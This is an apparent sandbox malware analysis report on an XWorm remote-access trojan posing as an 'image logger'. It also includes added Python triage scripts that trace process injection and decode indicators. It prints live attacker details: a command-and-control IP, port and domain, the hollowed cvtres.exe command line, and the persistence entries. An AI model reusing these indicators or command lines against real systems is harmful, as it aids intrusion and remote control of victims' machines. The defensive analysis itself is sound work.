Malware Analysis Report

2024-11-16 13:30

Sample ID 240621-pnlb2atcql
Target X Image logger beta V5.2.exe
SHA256 5efe623eb5e9326ae70270135f6dcf2e3b48a62daef1f1685e3f1f0445db5de4
Tags
xworm persistence rat trojan
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

5efe623eb5e9326ae70270135f6dcf2e3b48a62daef1f1685e3f1f0445db5de4

Threat Level: Known bad

The file X Image logger beta V5.2.exe was found to be: Known bad.

Malicious Activity Summary

xworm persistence rat trojan

Xworm

Contains code to disable Windows Defender

Detect Xworm Payload

Executes dropped EXE

Deletes itself

Drops startup file

Looks up external IP address via web service

Adds Run key to start application

Suspicious use of SetThreadContext

Unsigned PE

Enumerates physical storage devices

Suspicious use of SetWindowsHookEx

Suspicious use of WriteProcessMemory

Suspicious use of SendNotifyMessage

Modifies registry class

Suspicious use of FindShellTrayWindow

Suspicious use of AdjustPrivilegeToken

Suspicious behavior: GetForegroundWindowSpam

Modifies Internet Explorer settings

Suspicious behavior: AddClipboardFormatListener

Suspicious behavior: EnumeratesProcesses

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-06-21 12:28

Signatures

Unsigned PE

Description | Indicator | Process | Target
N/A | N/A | N/A | N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-06-21 12:28

Reported

2024-06-21 12:32

Platform

win11-20240611-en

Max time kernel

228s

Max time network

241s

Command Line

"C:\Users\Admin\AppData\Local\Temp\X Image logger beta V5.2.exe"

Signatures

Contains code to disable Windows Defender

Description | Indicator | Process | Target
N/A | N/A | N/A | N/A

Detect Xworm Payload

Description | Indicator | Process | Target
N/A | N/A | N/A | N/A
N/A | N/A | N/A | N/A

Xworm

trojan rat xworm

Deletes itself

Description | Indicator | Process | Target
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\RarSFX0\X Image logger beta V5.2.exe | N/A

Drops startup file

Description | Indicator | Process | Target
File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Anti root backup.lnk | C:\Users\Admin\AppData\Local\Temp\RarSFX0\X Image logger beta V5.2.exe | N/A
File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Anti root backup.lnk | C:\Users\Admin\AppData\Local\Temp\RarSFX0\X Image logger beta V5.2.exe | N/A

Executes dropped EXE

Description | Indicator | Process | Target
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\RarSFX0\X Image logger beta V5.2.exe | N/A

Adds Run key to start application

persistence
Description | Indicator | Process | Target
Set value (str) | \REGISTRY\USER\S-1-5-21-1560405787-796225086-678739705-1000\Software\Microsoft\Windows\CurrentVersion\Run\Anti root backup = "C:\\Users\\Admin\\Anti root backup" | C:\Users\Admin\AppData\Local\Temp\RarSFX0\X Image logger beta V5.2.exe | N/A

Looks up external IP address via web service

Description | Indicator | Process | Target
N/A | ip-api.com | N/A | N/A

Suspicious use of SetThreadContext

Description | Indicator | Process | Target
PID 4028 set thread context of 4600 | N/A | C:\Users\Admin\AppData\Local\Temp\RarSFX0\X Image logger beta V5.2.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe

Enumerates physical storage devices

Modifies Internet Explorer settings

adware spyware
Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-1560405787-796225086-678739705-1000\Software\Microsoft\Internet Explorer\Toolbar C:\Windows\explorer.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1560405787-796225086-678739705-1000\Software\Microsoft\Internet Explorer\Toolbar\Locked = "1" C:\Windows\explorer.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1560405787-796225086-678739705-1000\Software\Microsoft\Internet Explorer\Toolbar\ShellBrowser C:\Windows\explorer.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-1560405787-796225086-678739705-1000\Software\Microsoft\Internet Explorer\Toolbar\ShellBrowser\ITBar7Layout = 13000000000000000000000020000000100000000000000001000000010700005e01000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 C:\Windows\explorer.exe N/A

Modifies registry class

Description | Indicator | Process | Target
Set value (data) | \REGISTRY\USER\S-1-5-21-1560405787-796225086-678739705-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = ffffffff | C:\Windows\explorer.exe | N/A
Set value (data) | \REGISTRY\USER\S-1-5-21-1560405787-796225086-678739705-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\MRUListEx = 00000000ffffffff | C:\Windows\explorer.exe | N/A
Key created | \Registry\User\S-1-5-21-1560405787-796225086-678739705-1000_Classes\NotificationData | C:\Windows\explorer.exe | N/A
Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance\ | C:\Windows\explorer.exe | N/A
Set value (data) | \REGISTRY\USER\S-1-5-21-1560405787-796225086-678739705-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots | C:\Windows\explorer.exe | N/A
Set value (data) | \REGISTRY\USER\S-1-5-21-1560405787-796225086-678739705-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0 = 14001f50e04fd020ea3a6910a2d808002b30309d0000 | C:\Windows\explorer.exe | N/A
Set value (data) | \REGISTRY\USER\S-1-5-21-1560405787-796225086-678739705-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\MRUListEx = ffffffff | C:\Windows\explorer.exe | N/A
Key created | \REGISTRY\USER\S-1-5-21-1560405787-796225086-678739705-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell | C:\Windows\explorer.exe | N/A
Key created | \REGISTRY\USER\S-1-5-21-1560405787-796225086-678739705-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags | C:\Windows\explorer.exe | N/A
Key created | \REGISTRY\USER\S-1-5-21-1560405787-796225086-678739705-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1 | C:\Windows\explorer.exe | N/A
Set value (str) | \REGISTRY\USER\S-1-5-21-1560405787-796225086-678739705-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell\SniffedFolderType = "Documents" | C:\Windows\explorer.exe | N/A
Key created | \REGISTRY\USER\S-1-5-21-1560405787-796225086-678739705-1000_Classes\Local Settings | C:\Windows\explorer.exe | N/A
Key created | \REGISTRY\USER\S-1-5-21-1560405787-796225086-678739705-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU | C:\Windows\explorer.exe | N/A
Set value (data) | \REGISTRY\USER\S-1-5-21-1560405787-796225086-678739705-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = 00000000ffffffff | C:\Windows\explorer.exe | N/A
Set value (data) | \REGISTRY\USER\S-1-5-21-1560405787-796225086-678739705-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0 = 14002e80922b16d365937a46956b92703aca08af0000 | C:\Windows\explorer.exe | N/A
Set value (data) | \REGISTRY\USER\S-1-5-21-1560405787-796225086-678739705-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 02 | C:\Windows\explorer.exe | N/A
Set value (int) | \REGISTRY\USER\S-1-5-21-1560405787-796225086-678739705-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\NodeSlot = "1" | C:\Windows\explorer.exe | N/A
Key created | \REGISTRY\USER\S-1-5-21-1560405787-796225086-678739705-1000_Classes\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance\ | C:\Windows\explorer.exe | N/A
Key created | \REGISTRY\USER\S-1-5-21-1560405787-796225086-678739705-1000_Classes\Local Settings\MuiCache | C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\MiniSearchHost.exe | N/A
Key created | \REGISTRY\USER\S-1-5-21-1560405787-796225086-678739705-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell | C:\Windows\explorer.exe | N/A
Key created | \REGISTRY\USER\S-1-5-21-1560405787-796225086-678739705-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0 | C:\Windows\explorer.exe | N/A
Key created | \REGISTRY\USER\S-1-5-21-1560405787-796225086-678739705-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0 | C:\Windows\explorer.exe | N/A

Suspicious behavior: AddClipboardFormatListener

Description | Indicator | Process | Target
N/A | N/A | C:\Windows\explorer.exe | N/A

Suspicious behavior: EnumeratesProcesses

Description | Indicator | Process | Target
N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A
N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\RarSFX0\X Image logger beta V5.2.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\RarSFX0\X Image logger beta V5.2.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\RarSFX0\X Image logger beta V5.2.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\RarSFX0\X Image logger beta V5.2.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\RarSFX0\X Image logger beta V5.2.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\RarSFX0\X Image logger beta V5.2.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\RarSFX0\X Image logger beta V5.2.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\RarSFX0\X Image logger beta V5.2.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\RarSFX0\X Image logger beta V5.2.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\RarSFX0\X Image logger beta V5.2.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\RarSFX0\X Image logger beta V5.2.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\RarSFX0\X Image logger beta V5.2.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\RarSFX0\X Image logger beta V5.2.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\RarSFX0\X Image logger beta V5.2.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\RarSFX0\X Image logger beta V5.2.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\RarSFX0\X Image logger beta V5.2.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\RarSFX0\X Image logger beta V5.2.exe | N/A

Suspicious behavior: GetForegroundWindowSpam

Description | Indicator | Process | Target
N/A | N/A | C:\Windows\explorer.exe | N/A

Suspicious use of AdjustPrivilegeToken

Description | Indicator | Process | Target
Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\RarSFX0\X Image logger beta V5.2.exe | N/A
Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\RarSFX0\X Image logger beta V5.2.exe | N/A
Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeShutdownPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\RarSFX0\X Image logger beta V5.2.exe | N/A

Suspicious use of SetWindowsHookEx

Description | Indicator | Process | Target
N/A | N/A | C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\MiniSearchHost.exe | N/A
N/A | N/A | C:\Windows\explorer.exe | N/A
N/A | N/A | C:\Windows\explorer.exe | N/A

Suspicious use of WriteProcessMemory

Description | Indicator | Process | Target
PID 1516 wrote to memory of 4028 | N/A | C:\Users\Admin\AppData\Local\Temp\X Image logger beta V5.2.exe | C:\Users\Admin\AppData\Local\Temp\RarSFX0\X Image logger beta V5.2.exe
PID 1516 wrote to memory of 4028 | N/A | C:\Users\Admin\AppData\Local\Temp\X Image logger beta V5.2.exe | C:\Users\Admin\AppData\Local\Temp\RarSFX0\X Image logger beta V5.2.exe
PID 4028 wrote to memory of 4600 | N/A | C:\Users\Admin\AppData\Local\Temp\RarSFX0\X Image logger beta V5.2.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
PID 4028 wrote to memory of 4600 | N/A | C:\Users\Admin\AppData\Local\Temp\RarSFX0\X Image logger beta V5.2.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
PID 4028 wrote to memory of 4600 | N/A | C:\Users\Admin\AppData\Local\Temp\RarSFX0\X Image logger beta V5.2.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
PID 4028 wrote to memory of 4600 | N/A | C:\Users\Admin\AppData\Local\Temp\RarSFX0\X Image logger beta V5.2.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
PID 4028 wrote to memory of 4600 | N/A | C:\Users\Admin\AppData\Local\Temp\RarSFX0\X Image logger beta V5.2.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
PID 4028 wrote to memory of 4600 | N/A | C:\Users\Admin\AppData\Local\Temp\RarSFX0\X Image logger beta V5.2.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
PID 4028 wrote to memory of 4600 | N/A | C:\Users\Admin\AppData\Local\Temp\RarSFX0\X Image logger beta V5.2.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
PID 4028 wrote to memory of 4600 | N/A | C:\Users\Admin\AppData\Local\Temp\RarSFX0\X Image logger beta V5.2.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
PID 4600 wrote to memory of 3876 | N/A | C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 4600 wrote to memory of 3876 | N/A | C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 4600 wrote to memory of 3876 | N/A | C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 3876 wrote to memory of 1324 | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\SysWOW64\explorer.exe
PID 3876 wrote to memory of 1324 | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\SysWOW64\explorer.exe
PID 3876 wrote to memory of 1324 | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\SysWOW64\explorer.exe
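The WriteProcessMemory and SetThreadContext rows above describe one chain: the SFX stub writes into its extracted copy, the copy writes into cvtres.exe and then resets a thread context in it (write payload, then redirect execution, the pattern behind process hollowing and thread hijacking), and cvtres.exe in turn writes into powershell.exe, which writes into the 32-bit explorer.exe. The Python below is an added example, not part of the sandbox output; it reconstructs that chain from the rows as transcribed, counts the repeated calls, and applies two plain checks to the "Adds Run key" and "Drops startup file" rows (an autostart target inside the user profile, with no file extension, and a shortcut in the per-user Startup folder). The records are constructed from this report's tables; the rule that write-plus-SetThreadContext across different images is worth flagging is the editor's heuristic, not a verdict the sandbox states.

```python
from collections import Counter, defaultdict
import ntpath

# Transcribed from the "Suspicious use of WriteProcessMemory" and
# "Suspicious use of SetThreadContext" tables above, as
# (api, source_pid, source_image, target_pid, target_image).
# Repeated rows are kept: each one is a separately observed call.
SAMPLE = r"C:\Users\Admin\AppData\Local\Temp\X Image logger beta V5.2.exe"
SFX = r"C:\Users\Admin\AppData\Local\Temp\RarSFX0\X Image logger beta V5.2.exe"
CVTRES = r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe"
POWERSHELL = r"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"
EXPLORER32 = r"C:\Windows\SysWOW64\explorer.exe"

EVENTS = (
    [("WriteProcessMemory", 1516, SAMPLE, 4028, SFX)] * 2
    + [("WriteProcessMemory", 4028, SFX, 4600, CVTRES)] * 8
    + [("SetThreadContext", 4028, SFX, 4600, CVTRES)]
    + [("WriteProcessMemory", 4600, CVTRES, 3876, POWERSHELL)] * 3
    + [("WriteProcessMemory", 3876, POWERSHELL, 1324, EXPLORER32)] * 3
)

# From the "Adds Run key to start application" and "Drops startup file" tables.
RUN_VALUE = r"C:\\Users\\Admin\\Anti root backup"   # backslashes doubled as dumped
STARTUP_LNK = (r"C:\Users\Admin\AppData\Roaming\Microsoft\Windows"
               r"\Start Menu\Programs\Startup\Anti root backup.lnk")


def injection_chain(events, root_pid):
    """Follow WriteProcessMemory edges from the root process, one hop at a time."""
    writes = defaultdict(set)
    for api, src, _, dst, _ in events:
        if api == "WriteProcessMemory":
            writes[src].add(dst)
    chain, seen = [root_pid], {root_pid}
    while True:
        unvisited = sorted(writes[chain[-1]] - seen)
        if not unvisited:
            return chain
        chain.append(unvisited[0])      # only one child per hop in this run
        seen.add(unvisited[0])


def hollowing_candidates(events):
    """Targets that received both a memory write and a SetThreadContext from the
    same source, where source and target images differ (editor's heuristic)."""
    apis_by_pair, image = defaultdict(set), {}
    for api, src, src_img, dst, dst_img in events:
        apis_by_pair[(src, dst)].add(api)
        image[src], image[dst] = src_img, dst_img
    return [
        (src, dst, ntpath.basename(image[dst]))
        for (src, dst), apis in sorted(apis_by_pair.items())
        if {"WriteProcessMemory", "SetThreadContext"} <= apis
        and image[src].lower() != image[dst].lower()
    ]


def call_counts(events):
    """How many times each (api, source, target) triple was recorded."""
    return Counter((api, src, dst) for api, src, _, dst, _ in events)


def persistence_findings(run_value, startup_lnk):
    """Autostart entries worth attention: a Run value pointing into a user
    profile rather than Program Files or Windows, a target with no extension,
    and any shortcut dropped into the per-user Startup folder."""
    findings = []
    target = run_value.replace("\\\\", "\\")        # undo the dump's escaping
    if target.lower().startswith("c:\\users\\"):
        findings.append(f"Run key target in user profile: {target}")
    if not ntpath.splitext(target)[1]:
        findings.append("Run key target has no file extension")
    if "\\start menu\\programs\\startup\\" in startup_lnk.lower():
        findings.append(f"Startup folder shortcut: {ntpath.basename(startup_lnk)}")
    return findings


if __name__ == "__main__":
    print(" -> ".join(map(str, injection_chain(EVENTS, 1516))))
    for src, dst, img in hollowing_candidates(EVENTS):
        print(f"PID {src} wrote to and redirected a thread in PID {dst} ({img})")
    for (api, src, dst), n in sorted(call_counts(EVENTS).items()):
        print(f"{api} {src} -> {dst}: {n} calls")
    for line in persistence_findings(RUN_VALUE, STARTUP_LNK):
        print(line)
```

Run against the transcribed rows it prints the chain 1516 -> 4028 -> 4600 -> 3876 -> 1324 and names cvtres.exe as the only process that was both written to and had a thread redirected; the same functions work unchanged on records pulled from a Sysmon or EDR export once they are shaped as the same five-field tuples.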

Processes

C:\Users\Admin\AppData\Local\Temp\X Image logger beta V5.2.exe

"C:\Users\Admin\AppData\Local\Temp\X Image logger beta V5.2.exe"

C:\Users\Admin\AppData\Local\Temp\RarSFX0\X Image logger beta V5.2.exe

"C:\Users\Admin\AppData\Local\Temp\RarSFX0\X Image logger beta V5.2.exe"

C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\MiniSearchHost.exe

"C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\MiniSearchHost.exe" -ServerName:MiniSearchUI.AppXj3y73at8fy1htwztzxs68sxx1v7cksp7.mca

C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe" 147.185.221.20 23695 <123456789> 6F39F110501D9DF4D96A

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -c explorer shell:::{3080F90E-D7AD-11D9-BD98-0000947B0257}

C:\Windows\SysWOW64\explorer.exe

"C:\Windows\system32\explorer.exe" shell::: -encodedCommand MwAwADgAMABGADkAMABFAC0ARAA3AEEARAAtADEAMQBEADkALQBCAEQAOQA4AC0AMAAwADAAMAA5ADQANwBCADAAMgA1ADcA -inputFormat xml -outputFormat text

C:\Windows\explorer.exe

C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding

C:\Windows\System32\rundll32.exe

C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {3eef301f-b596-4c0b-bd92-013beafce793} -Embedding
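The command lines in the Processes section carry the most useful indicators in this run: cvtres.exe (the .NET resource converter, which legitimately takes .res and .obj file names) is started with an IP address and port, powershell.exe opens a shell CLSID, and the 32-bit explorer.exe is handed PowerShell's -encodedCommand, -inputFormat and -outputFormat switches. The Python below is an added example and not part of the sandbox output. It pulls those values out of the command lines copied from the table, decodes the -encodedCommand argument (PowerShell encodes it as base64 over UTF-16LE) and checks that it is the same CLSID the powershell.exe child opened. The command lines are copied from this report; the cvtres.exe heuristic and the list of PowerShell-only switches are the editor's assumptions, and the two remaining cvtres.exe arguments are carried along without interpretation because the report does not establish their meaning.

```python
import base64
import ntpath
import re

# Command lines copied from the Processes section above, keyed by the PIDs
# that appear in the WriteProcessMemory table; embedded so the example runs offline.
PROCESSES = {
    1516: r'"C:\Users\Admin\AppData\Local\Temp\X Image logger beta V5.2.exe"',
    4028: r'"C:\Users\Admin\AppData\Local\Temp\RarSFX0\X Image logger beta V5.2.exe"',
    4600: (r'"C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe" '
           r'147.185.221.20 23695 <123456789> 6F39F110501D9DF4D96A'),
    3876: r'powershell.exe -c explorer shell:::{3080F90E-D7AD-11D9-BD98-0000947B0257}',
    1324: (r'"C:\Windows\system32\explorer.exe" shell::: -encodedCommand '
           r'MwAwADgAMABGADkAMABFAC0ARAA3AEEARAAtADEAMQBEADkALQBCAEQAOQA4AC0A'
           r'MAAwADAAMAA5ADQANwBCADAAMgA1ADcA -inputFormat xml -outputFormat text'),
}

IPV4 = re.compile(r"^(?:\d{1,3}\.){3}\d{1,3}$")
CLSID = re.compile(r"shell:::\{([0-9A-Fa-f]{8}(?:-[0-9A-Fa-f]{4}){3}-[0-9A-Fa-f]{12})\}")
# Switches only powershell.exe understands (editor's list, not from the report).
POWERSHELL_SWITCHES = {"-encodedcommand", "-inputformat", "-outputformat"}


def split_args(cmdline):
    """Windows-style split: a double-quoted run is one argument, quotes dropped."""
    return [quoted or bare for quoted, bare in re.findall(r'"([^"]*)"|(\S+)', cmdline)]


def c2_from_cvtres(cmdline):
    """cvtres.exe never takes an IP and port; when it does, the process has been
    hollowed and the arguments are the payload's configuration (editor's heuristic)."""
    args = split_args(cmdline)
    if ntpath.basename(args[0]).lower() != "cvtres.exe":
        return None
    for i in range(1, len(args) - 1):
        if IPV4.match(args[i]) and args[i + 1].isdigit():
            return {"host": args[i], "port": int(args[i + 1]), "rest": args[i + 2:]}
    return None


def decode_encoded_command(cmdline):
    """PowerShell's -EncodedCommand is base64 over UTF-16LE text."""
    args = split_args(cmdline)
    for i, arg in enumerate(args[:-1]):
        if arg.lower() == "-encodedcommand":
            return base64.b64decode(args[i + 1]).decode("utf-16-le")
    return None


def misplaced_powershell_switches(cmdline):
    """PowerShell-only switches passed to a binary that is not powershell.exe."""
    args = split_args(cmdline)
    if ntpath.basename(args[0]).lower() == "powershell.exe":
        return []
    return [a for a in args[1:] if a.lower() in POWERSHELL_SWITCHES]


def triage(processes):
    """Collect the indicators from every command line in one pass."""
    findings = {"c2": None, "clsid": None, "decoded": None, "odd_switches": {}}
    for pid, cmd in processes.items():
        c2 = c2_from_cvtres(cmd)
        if c2:
            findings["c2"] = dict(c2, pid=pid)
        match = CLSID.search(cmd)
        if match:
            findings["clsid"] = match.group(1).upper()
        decoded = decode_encoded_command(cmd)
        if decoded:
            findings["decoded"] = decoded
        odd = misplaced_powershell_switches(cmd)
        if odd:
            findings["odd_switches"][pid] = odd
    findings["decoded_matches_clsid"] = (
        findings["decoded"] is not None and findings["decoded"].upper() == findings["clsid"]
    )
    return findings


if __name__ == "__main__":
    for key, value in triage(PROCESSES).items():
        print(f"{key}: {value}")
```

On the command lines above this yields host 147.185.221.20, port 23695 (matching the Network table), the CLSID 3080F90E-D7AD-11D9-BD98-0000947B0257 from the powershell.exe child, and the same CLSID once the -encodedCommand argument on explorer.exe is decoded, which ties the two child processes to a single intent.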

Network

Country | Destination | Domain | Proto
US | 8.8.8.8:53 | ip-api.com | udp
US | 208.95.112.1:80 | ip-api.com | tcp
US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp
US | 147.185.221.20:23695 | modern-educators.gl.at.ply.gg | tcp
US | 147.185.221.20:23695 | modern-educators.gl.at.ply.gg | tcp
US | 147.185.221.20:23695 | modern-educators.gl.at.ply.gg | tcp

Files

C:\Users\Admin\AppData\Local\Temp\RarSFX0\X Image logger beta V5.2.exe

MD5 060295a703861c237ad7bc31553a7957
SHA1 07185d1bf97ac9bd46b2767cc42abaf32ad85aab
SHA256 2f0eafb4fddbe251965522b1ad3190baf20a8921b5e1672f0b795a8e6e84bcc3
SHA512 ee681def62064e1ee3d6fc4ddd51edb44d0897fb64c3cfa2daab0c8a9b32db20dbe66efbc8f10fde65d38dce028837a3882473fd882fef34fbbb4c3e02bd947d

memory/4028-12-0x00007FF8EAC63000-0x00007FF8EAC65000-memory.dmp

memory/4028-13-0x0000000000600000-0x000000000064C000-memory.dmp

memory/4028-14-0x00007FF8EAC60000-0x00007FF8EB722000-memory.dmp

memory/4028-18-0x00007FF8EAC63000-0x00007FF8EAC65000-memory.dmp

memory/4028-19-0x00007FF8EAC60000-0x00007FF8EB722000-memory.dmp

memory/4028-20-0x0000000000E90000-0x0000000000E98000-memory.dmp

memory/4028-22-0x000000001C140000-0x000000001C14A000-memory.dmp

C:\Users\Admin\AppData\Local\Packages\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\TempState\~earchHoverUnifiedTileModelCache.tmp

MD5 9a7af7f1f08f7de9da3ba647286ee5a6
SHA1 d7a23961ba5f8c4242a03f20686ff516c2ae432c
SHA256 dddc3d322b46ec53927c26326a4f4d573dec131fbe668450f984c91c3104a08b
SHA512 64b0d94e68aa2d0ee9d02f170de6989f5255c5c57d05dffbf4dbbe012dae43a6f4dbd59c6a85fd2621fb84ae7f4cdf486a089b90e3e6c4fce1b152ba5aa6ba58

C:\Users\Admin\AppData\Local\Packages\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\TempState\SearchHoverUnifiedTileModelCache.dat

MD5 35745802ec2865acb4c60e651e5a8620
SHA1 f10c746a71c2741790aa3f5160ea7d9be1a1920a
SHA256 ef386e977e9fcfc811f2710d0d630e23e2278cf9811770da0c2f10f3965b7a63
SHA512 0031f739cafa1089dc655a3509bc215fc900c20734507a1b0b69f1ad1567fb2fe4af725360cf952a4689e89973bbd59a53ea6ff8bd6c4c67b9e732f66f14a42f

memory/4028-42-0x000000001C180000-0x000000001C196000-memory.dmp

memory/4600-44-0x00000000003C0000-0x00000000003D0000-memory.dmp

memory/4600-45-0x0000000005050000-0x00000000050E2000-memory.dmp

memory/4600-46-0x00000000050F0000-0x000000000518C000-memory.dmp

memory/4600-47-0x0000000005740000-0x0000000005CE6000-memory.dmp

memory/4600-48-0x0000000005320000-0x0000000005386000-memory.dmp

memory/3876-49-0x0000000002630000-0x0000000002666000-memory.dmp

memory/3876-50-0x0000000004DC0000-0x00000000053EA000-memory.dmp

memory/3876-51-0x0000000004B10000-0x0000000004B32000-memory.dmp

memory/3876-52-0x0000000004BB0000-0x0000000004C16000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_tjri0jiw.hnb.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/3876-61-0x00000000055B0000-0x0000000005907000-memory.dmp

memory/3876-62-0x0000000005AD0000-0x0000000005AEE000-memory.dmp

memory/3876-63-0x0000000005B60000-0x0000000005BAC000-memory.dmp

memory/4028-72-0x000000001B5B0000-0x000000001B5BE000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\Explorer\iconcache_idx.db

MD5 3df44998aca4a87ccc0633ceade8752c
SHA1 7417391df4b0deb676e12d2c81aa3df265b2cf31
SHA256 0df3cba256cf8e1e6e2f78b5f33ed790dd69fb4b5a72fa3b9aa43a825c4ba0fd
